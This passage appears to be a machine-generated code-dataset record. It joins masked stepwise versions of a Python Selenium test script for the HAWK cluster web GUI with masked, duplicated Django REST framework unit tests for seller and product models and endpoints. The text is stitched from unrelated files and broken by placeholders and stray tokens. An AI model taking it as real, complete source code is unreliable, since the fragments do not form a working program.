"step-2": "<mask token>\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\n<mask token>\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\n<mask token>\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-4": "<mask token>\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-5": "#!/usr/bin/python3\n\"\"\"HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome\"\"\"\n\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\n\n### MAIN\n\n# Command line argument parsing\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')\nparser.add_argument('-b', '--browser', type=str, required=True,\n help='Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost',\n help='Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630',\n help='TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='',\n help='Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=True,\n help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='',\n help='root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='',\n help='Generate hawk_test.results file')\nargs = parser.parse_args()\n\n# Create driver instance\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,\n browser=args.browser.lower(),\n version=args.test_version.lower())\n\n# Initialize results set\nresults = hawk_test_results.resultSet()\n\n# Establish SSH connection to verify status only if SSH password was supplied\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\n\n# Resources to create\nif args.prefix and not re.match(r\"^\\w+$\", args.prefix.lower()):\n print(\"ERROR: Prefix must contain only numbers and letters. Ignoring\")\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\n\n# Tests to perform\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\n\n# Save results if run with -r or --results\nif args.results:\n results.logresults(args.results)\n\nquit(results.get_failed_tests_total())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
<|reserved_special_token_0|>
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = 'Bruna'
self.assertEquals(seller.__str__(), 'Bruna')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
def product_to_dict(self):
product = Product()
product.name = 'Cadeira'
product.price = 2000
product.seller = 'Bruna'
product.quantity = 10
product.status = 'Active'
result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,
'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
from django.test import TestCase
from .models import Seller, Product
from rest_framework.test import APIClient
import json
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = 'Bruna'
self.assertEquals(seller.__str__(), 'Bruna')
def test_to_dict(self):
seller = Seller()
seller.name = 'Bruna'
seller.email = 'bruna@example.com'
result_seller = {'id': None, 'name': 'Bruna', 'email':
'bruna@example.com'}
self.assertEquals(seller.to_dict(), result_seller)
def test_class_str_without_name(self):
seller = Seller()
self.assertEqual(seller.__str__(), '')
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
def product_to_dict(self):
product = Product()
product.name = 'Cadeira'
product.price = 2000
product.seller = 'Bruna'
product.quantity = 10
product.status = 'Active'
result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,
'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
from django.test import TestCase
from .models import Seller, Product
from rest_framework.test import APIClient
import json
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = "Bruna"
self.assertEquals(seller.__str__(), "Bruna")
def test_to_dict(self):
seller = Seller()
seller.name = "Bruna"
seller.email = "bruna@example.com"
result_seller = {
"id": None,
"name": "Bruna",
"email": "bruna@example.com"
}
self.assertEquals(seller.to_dict(), result_seller)
def test_class_str_without_name(self):
seller = Seller()
self.assertEqual(seller.__str__(), "")
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = "Cadeira"
self.assertEquals(product.__str__(), "Cadeira")
def product_to_dict(self):
product = Product()
product.name = "Cadeira"
product.price = 2000
product.seller = "Bruna"
product.quantity = 10
product.status = "Active"
result_product = {
"id": None,
"name": "Cadeira",
"price": 2000,
"seller": "Bruna",
"quantity": 10,
"status": "Active"
}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name="Bruna", email="bruna@example.com")
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get("name"), "Bruna")
self.assertEqual(seller_first.get("email"), "bruna@example.com")
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {
"name": "Bruna",
"email": "bruna@example.com"
})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, "Bruna")
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name="Cadeira", price=250, quantity=2, status="Active")
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get("name"), "Cadeira")
self.assertEqual(product_first.get("price"), 250)
self.assertEqual(product_first.get("quantity"), 2)
self.assertEqual(product_first.get("status"), "Active")
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {
"name": "Mesa",
"price": 300,
"quantity": 2,
"status": "ACTIVE"
})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, "Mesa")
|
flexible
|
{
"blob_id": "71ab4ada4062ecde1463f2a766b5951860d0f2fb",
"index": 7250,
"step-1": "<mask token>\n\n\nclass ProductModelTests(TestCase):\n <mask token>\n <mask token>\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-2": "<mask token>\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n <mask token>\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-3": "<mask token>\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = 'Bruna'\n self.assertEquals(seller.__str__(), 'Bruna')\n <mask token>\n <mask token>\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n\n def product_to_dict(self):\n product = Product()\n product.name = 'Cadeira'\n product.price = 2000\n product.seller = 'Bruna'\n product.quantity = 10\n product.status = 'Active'\n result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,\n 'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-4": "from django.test import TestCase\nfrom .models import Seller, Product\nfrom rest_framework.test import APIClient\nimport json\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = 'Bruna'\n self.assertEquals(seller.__str__(), 'Bruna')\n\n def test_to_dict(self):\n seller = Seller()\n seller.name = 'Bruna'\n seller.email = 'bruna@example.com'\n result_seller = {'id': None, 'name': 'Bruna', 'email':\n 'bruna@example.com'}\n self.assertEquals(seller.to_dict(), result_seller)\n\n def test_class_str_without_name(self):\n seller = Seller()\n self.assertEqual(seller.__str__(), '')\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n\n def product_to_dict(self):\n product = Product()\n product.name = 'Cadeira'\n product.price = 2000\n product.seller = 'Bruna'\n product.quantity = 10\n product.status = 'Active'\n result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,\n 'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
